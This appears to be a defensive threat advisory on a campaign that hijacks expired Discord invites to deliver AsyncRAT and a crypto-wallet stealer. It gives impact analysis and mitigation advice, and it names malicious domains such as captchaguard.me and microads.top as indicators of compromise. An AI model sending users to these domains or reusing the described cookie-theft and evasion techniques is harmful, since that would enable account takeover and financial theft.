The threat campaign titled "From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery" involves a sophisticated multi-stage malware distribution operation exploiting expired Discord invite links. Attackers hijack these expired invites to redirect users to malicious servers, leveraging the inherent trust users place in Discord invite links. The campaign employs ClickFix phishing techniques to lure victims into interacting with malicious content. It uses multi-stage loaders and time-based evasion tactics to avoid detection by security solutions. The primary payloads delivered are AsyncRAT, a remote access trojan capable of extensive system control, and a customized variant of the Skuld Stealer malware specifically targeting cryptocurrency wallets, aiming to exfiltrate sensitive financial data. The attackers utilize trusted cloud services for both payload delivery and data exfiltration, which helps them blend their malicious traffic with legitimate network activity, further complicating detection efforts. Notably, the campaign has evolved to bypass Chrome's App Bound Encryption, a security feature designed to protect browser cookies, by using an adapted tool named ChromeKatz. This capability allows the threat actors to steal cookies from the latest Chromium-based browsers, potentially enabling session hijacking and unauthorized access to web accounts. The exploitation of subtle features in Discord's invite system as an attack vector highlights the innovative approach of the adversaries. Indicators of compromise include multiple malware hashes, IP addresses, and domains such as captchaguard.me and microads.top, which are involved in the campaign's infrastructure. The campaign is ongoing and continues to adapt, underscoring the persistent threat it poses to users relying on Discord and Chromium browsers.

For European organizations, this campaign poses significant risks, particularly to entities with employees or users who actively use Discord and Chromium-based browsers. The targeted theft of cryptocurrency wallet data threatens financial assets, which is especially relevant for fintech companies, cryptocurrency exchanges, and individuals involved in digital asset management. The use of trusted cloud services for payload delivery and exfiltration complicates detection and response, increasing the likelihood of successful breaches. The ability to bypass Chrome's App Bound Encryption and steal browser cookies can lead to session hijacking, unauthorized access to corporate web applications, and potential lateral movement within networks. Phishing via hijacked Discord invites can also lead to initial compromise of endpoints, potentially resulting in data breaches, intellectual property theft, and disruption of business operations. The multi-stage and time-based evasion techniques mean that traditional signature-based defenses may be insufficient, increasing the risk of prolonged undetected presence within networks. Overall, the campaign can impact confidentiality, integrity, and availability of organizational data and systems, with potential financial and reputational damage.

1. Implement advanced email and messaging security solutions that can detect and block phishing attempts, including those leveraging social platforms like Discord. 2. Educate employees and users about the risks of clicking on expired or suspicious Discord invite links and encourage verification of invite legitimacy before interaction. 3. Deploy endpoint detection and response (EDR) tools capable of identifying multi-stage loaders and unusual process behaviors indicative of AsyncRAT or Skuld Stealer infections. 4. Monitor network traffic for connections to known malicious domains and IPs associated with this campaign (e.g., captchaguard.me, microads.top) and block them at the firewall or proxy level. 5. Enforce strict browser security policies, including disabling or restricting extensions and plugins that could be exploited, and regularly update Chromium-based browsers to the latest versions with security patches. 6. Utilize multi-factor authentication (MFA) for access to critical systems and web applications to mitigate risks from stolen cookies and session hijacking. 7. Conduct regular threat hunting exercises focusing on indicators of compromise related to AsyncRAT, Skuld Stealer, and ChromeKatz activity. 8. Limit the use of cloud services for sensitive data transfer unless encrypted and monitored, and apply strict access controls. 9. Implement network segmentation to contain potential infections and reduce lateral movement opportunities. 10. Collaborate with Discord and cloud service providers to report and remediate hijacked invite links and malicious infrastructure promptly.